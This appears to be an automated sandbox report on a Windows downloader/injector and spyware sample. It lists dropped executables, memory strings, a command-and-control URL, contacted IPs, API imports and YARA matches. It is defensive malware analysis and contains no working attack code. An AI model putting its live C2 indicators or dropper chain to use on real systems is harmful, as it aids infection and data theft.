Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:33:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:33:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.css
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.jpg
Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Set-up.exe, Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrm
Source: Set-up.exe.0.dr	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
Source: Set-up.exe, Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985706274.00000000012E9000.00000004.00000001.01000000.00000008.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
Source: Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1
Source: Set-up.exe, Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
Source: Set-up.exe, 00000002.00000002.1985706274.00000000012E9000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
Source: Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrms
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000001.00000000.1712224288.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000007429000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://timestamp.digicert.com0
Source: Climb.com, 0000000D.00000000.1778645855.0000000000AF5000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ip
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ipbefore
Source: Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: Climb.com, 0000000D.00000003.2167509243.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Climb.com, 0000000D.00000003.2167581088.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167509243.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Climb.com, 0000000D.00000003.2167581088.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Climb.com, 0000000D.00000003.2167581088.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167509243.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Climb.com, 0000000D.00000003.2167581088.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Climb.com, 0000000D.00000003.2239939802.0000000003C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag
Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Climb.com.3.dr, PasoCattle.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49754 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 1_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 1_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_004044D1

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.vUcZzNWkKc.exe.610000.0.unpack, type: UNPACKEDPE

Matched rule: Detects downloader / injector Author: ditekSHen

PE file contains section with special chars

Source: vUcZzNWkKc.exe	Static PE information: section name:
Source: vUcZzNWkKc.exe	Static PE information: section name: .idata
Source: vUcZzNWkKc.exe	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 1_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,

1_2_004038AF

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\UtilitySoccer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\MoveRefurbished	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\ClarkWriter	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 1_2_0040737E	1_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 1_2_00406EFE	1_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 1_2_004079A2	1_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 1_2_004049A8	1_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_008DDE63	2_3_008DDE63

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\768400\Climb.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: String function: 004062CF appears 57 times

Source: vUcZzNWkKc.exe, 00000000.00000002.1747857087.0000000000DA2000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameladdad.exe4 vs vUcZzNWkKc.exe
Source: vUcZzNWkKc.exe, 00000000.00000002.1754161112.00000000050A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameladdad.exe4 vs vUcZzNWkKc.exe
Source: vUcZzNWkKc.exe	Binary or memory string: OriginalFilenameladdad.exe4 vs vUcZzNWkKc.exe

Source: vUcZzNWkKc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.vUcZzNWkKc.exe.610000.0.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: vUcZzNWkKc.exe

Static PE information: Section: ycplgdyn ZLIB complexity 0.9944026649228258

Source: Set-up.exe.0.dr

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@28/23@10/3

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

1_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 1_2_004024FB CoCreateInstance,

1_2_004024FB

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vUcZzNWkKc.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
